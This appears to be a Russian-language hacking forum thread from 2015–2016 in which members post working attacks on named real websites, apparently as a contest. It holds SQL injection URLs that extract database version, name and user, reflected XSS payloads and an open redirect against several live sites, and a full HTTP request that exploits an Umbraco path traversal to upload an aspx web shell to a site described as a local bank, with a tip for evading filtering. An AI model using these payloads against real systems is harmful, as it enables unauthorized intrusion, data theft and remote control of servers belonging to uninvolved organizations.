27.11.2015, 12:54
|
|
Новичок
Регистрация: 27.11.2015
Сообщений: 19
С нами:
5506166
Репутация:
6
|
|
SQLi
http://www.ataegitim.com.tr/yurtdisi_egitim.php?id=1+union+select+1,2,3,versio n(),5,6,7
http://www.bursaymmo.org.tr/fotografgalerisi/haber_oku.php?haber_id=14+union+select+version(),2 ,3,4,5,6
http://www.sistemkalip.com.tr/tr/haber_detay.php?recordID=1+union+select+1,2,versio n(),4,5,6 |
|
|
28.11.2015, 17:22
|
|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
С нами:
5653046
Репутация:
1
|
|
Сайт: http://www.academyplazahotel.ie/
Уязвимость: Reflected XSS
Код:
http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"-->alert(1234567890)
Сайт: http://www.cleanrooms-ireland.ie
Уязвимость: Reflected XSS
Код:
http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"-->alert(1234567890)
там же: (?redirect?)
Код:
http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com
Сайт: http://forums.somethingawful.com
Уязвимость: Reflected XSS
Код:
http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25alert(1234567890)
Сайт: http://www.zoommoola.com
Уязвимость: Reflected XSS
Код:
http://www.zoommoola.com/?ref='"-->alert(1234567890)
Сайт: http://www.usatestprep.com
Уязвимость: Reflected XSS
Код:
http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%alert(123456)
Сайт: http://txbra.org
Уязвимость: XSS
Код:
HTMLFormElement.prototype.submit.call(document.forms[0]);
|
|
|
|
02.12.2015, 15:15
|
|
Новичок
Регистрация: 27.11.2015
Сообщений: 19
С нами:
5506166
Репутация:
6
|
|
Конкурс уже не актуален?
http://www.tontomarine.co.uk/boat.p...4,5,version(),7,8,9,0,11,12,13,14,15,16,1 7,18 |
|
|
|
21.12.2015, 14:15
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
актуален, времени пока нет разгрести. позже всем добавлю
|
|
|
|
31.12.2015, 20:41
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами:
5710646
Репутация:
24
|
|
Remote Code Execution
Сайт: ecb.md
Эксплоит:
Код:
POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
SOAPAction: "http://tempuri.org/SaveDLRScript"
Content-Type: text/xml
Host: ecb.md
Content-Length: 710
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/..\\..\\..\\umbraco\\shell.aspx
string
Код шелла .aspx,в burpsuite выбираем
Convert selection->Html->Html encode key characters
так прошел через фильтрацию
1
Заливается тут ecb.md/umbraco/shell.aspx |
|
|
|
01.01.2016, 01:15
|
|
Новичок
Регистрация: 13.07.2011
Сообщений: 29
С нами:
7807286
Репутация:
0
|
|
зашел на ecb.md, стало страшно, ушел)
|
|
|
|
01.01.2016, 01:19
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами:
5710646
Репутация:
24
|
|
Сообщение от chatanti
↑
зашел на ecb.md, стало страшно, ушел)
Месныи банк )
|
|
|
|
04.01.2016, 16:00
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от AAI
↑
Сайт:
http://www.cobranet.org/
Уязвимость: SQL injection
Код:
http://www.cobranet.org/about.php?id=1+union+select+1,2,3,4,5,6
к сожалению дальше не раскрутил.
Вы уже всё сделали
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(),5,6+--+-[/COLOR][/COLOR]
|
|
|
|
04.01.2016, 19:07
|
|
Новичок
Регистрация: 27.12.2015
Сообщений: 16
С нами:
5462966
Репутация:
1
|
|
|
|
|
|
06.01.2016, 12:12
|
|
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами:
5785526
Репутация:
6
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
